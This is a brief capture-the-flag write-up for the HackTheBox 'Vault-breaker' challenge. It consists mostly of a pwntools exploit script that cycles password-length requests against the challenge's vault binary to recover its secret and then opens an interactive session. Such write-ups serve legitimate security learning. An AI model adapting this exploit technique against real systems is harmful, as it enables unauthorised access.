HackTheBox Vault-breaker Challenge

2024-12-17[Updated: 2024-12-17]

https://app.hackthebox.com/challenges/333

Description

Money maker, Big Boy Bonnie has a crew of his own to do his dirty jobs. In a tiny little planet a few lightyears away, a custom-made vault has been found by his crew. Something is hidden inside it, can you find out the way it works and bring it to Bonnie?

Exploitation

#!/usr/bin/python3
from pwn import *

context.binary = 'vault-breaker'

def get_process():
    if len(sys.argv) == 1:
        return context.binary.process()
    host, port = sys.argv[1].split(':')
    return remote(host, int(port))

if __name__ == '__main__':
    p = get_process()
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'[*] Length of new password (0-31): ', b'0')
    progress = log.progress('Number')
    for i in range(31, -1, -1):
        progress.status(str(i))
        p.sendlineafter(b'> ', b'1')
        p.sendlineafter(b'[*] Length of new password (0-31): ', str(i).encode())
    p.sendlineafter(b'> ', b'2')
    p.interactive()

Summary

Vault-breaker: build the exploit primitive, stabilize the payload, and use it to read the flag.